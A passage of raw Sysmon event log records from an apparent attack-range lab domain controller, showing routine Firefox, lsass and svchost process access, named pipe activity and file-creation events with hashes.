12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042402Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000042401Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:41.777{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\chrome.3296.3.156121093C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000042400Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.759{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB379FD744E013E00060EC07242559BF,SHA256=B8550FA3235FD8359C2E590CED1343A9DAE9DA3040C705BE716B75D5AFC8341E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042399Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.734{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042398Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.719{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042397Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.703{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000042396Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.703{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042395Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.703{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042394Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.703{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042393Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.703{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042392Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.578{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042391Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.562{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042390Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:41.547{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\LOCAL\cubeb-pipe-3296-0C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000042389Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:41.547{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\LOCAL\cubeb-pipe-3296-0C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000042388Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.547{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F30A9F46FDC4BC3EE35CD2439CB5EC58,SHA256=1C6DE07ADAE1B84DF3CB788E6AE25E534D38A102895B632B9E1B137059B1A94C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042387Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.531{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042386Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.437{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042385Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:41.437{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko.3296.6128.15853524997265763091C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000042384Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:41.437{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko.3296.6128.15853524997265763091C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042383Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.437{FE4C2B44-E48F-63C7-3106-00000000AF02}32966128C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042382Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:41.437{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\chrome.3296.2.172309186C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042381Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.437{FE4C2B44-E48F-63C7-3106-00000000AF02}32963564C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042380Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:41.437{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko-crash-server-pipe.3296C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042379Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.412{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+f68f92|C:\Program Files\Mozilla Firefox\xul.dll+b7bf9e|C:\Program Files\Mozilla Firefox\xul.dll+24922f|C:\Program Files\Mozilla Firefox\xul.dll+248fba|C:\Program Files\Mozilla Firefox\xul.dll+f858cd|C:\Program Files\Mozilla Firefox\xul.dll+1095b87|C:\Program Files\Mozilla Firefox\xul.dll+e63e24|C:\Program Files\Mozilla Firefox\xul.dll+c2d528|C:\Program Files\Mozilla Firefox\xul.dll+c2ac3d|C:\Program Files\Mozilla Firefox\xul.dll+24fe6b|C:\Program Files\Mozilla Firefox\xul.dll+24f993|C:\Program Files\Mozilla Firefox\xul.dll+105ab0f|C:\Program Files\Mozilla Firefox\xul.dll+1882709|C:\Program Files\Mozilla Firefox\xul.dll+1880b50|C:\Program Files\Mozilla Firefox\xul.dll+c2d021|C:\Program Files\Mozilla Firefox\xul.dll+236871|C:\Program Files\Mozilla Firefox\xul.dll+ce82ce|C:\Program Files\Mozilla Firefox\xul.dll+1870580|C:\Program Files\Mozilla Firefox\xul.dll+1822181|C:\Program Files\Mozilla Firefox\xul.dll+1d02fbf|C:\Program Files\Mozilla Firefox\xul.dll+1e7190e|C:\Program Files\Mozilla Firefox\xul.dll+1822568 10341000x800000000000000042378Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.411{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e7653c|C:\Program Files\Mozilla Firefox\xul.dll+e78bb2|C:\Program Files\Mozilla Firefox\xul.dll+c2d887|C:\Program Files\Mozilla Firefox\xul.dll+c2ac3d|C:\Program Files\Mozilla Firefox\xul.dll+24fe6b|C:\Program Files\Mozilla Firefox\xul.dll+24f993|C:\Program Files\Mozilla Firefox\xul.dll+105ab0f|C:\Program Files\Mozilla Firefox\xul.dll+1882709|C:\Program Files\Mozilla Firefox\xul.dll+1880b50|C:\Program Files\Mozilla Firefox\xul.dll+c2d021|C:\Program Files\Mozilla Firefox\xul.dll+236871|C:\Program Files\Mozilla Firefox\xul.dll+ce82ce|C:\Program Files\Mozilla Firefox\xul.dll+1870580|C:\Program Files\Mozilla Firefox\xul.dll+1822181|C:\Program Files\Mozilla Firefox\xul.dll+1d02fbf|C:\Program Files\Mozilla Firefox\xul.dll+1e7190e|C:\Program Files\Mozilla Firefox\xul.dll+1822568|C:\Program Files\Mozilla Firefox\xul.dll+1d02fbf 10341000x800000000000000042377Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.406{FE4C2B44-E48F-63C7-3106-00000000AF02}32966128C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042376Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.402{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042375Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.402{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042374Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.401{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042373Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.401{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042372Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.401{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042371Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.401{FE4C2B44-E48F-63C7-3106-00000000AF02}32963116C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042370Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.401{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3296.2.1723091861\394103787" -childID 1 -isForBrowser -prefsHandle 2920 -prefMapHandle 2864 -prefsLen 26011 -prefMapSize 234522 -jsInitHandle 1112 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {edd42fe7-dcf0-4bd8-aba4-3294aa95ba46} 3296 "\\.\pipe\gecko-crash-server-pipe.3296" 2932 1fb413c4558 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla 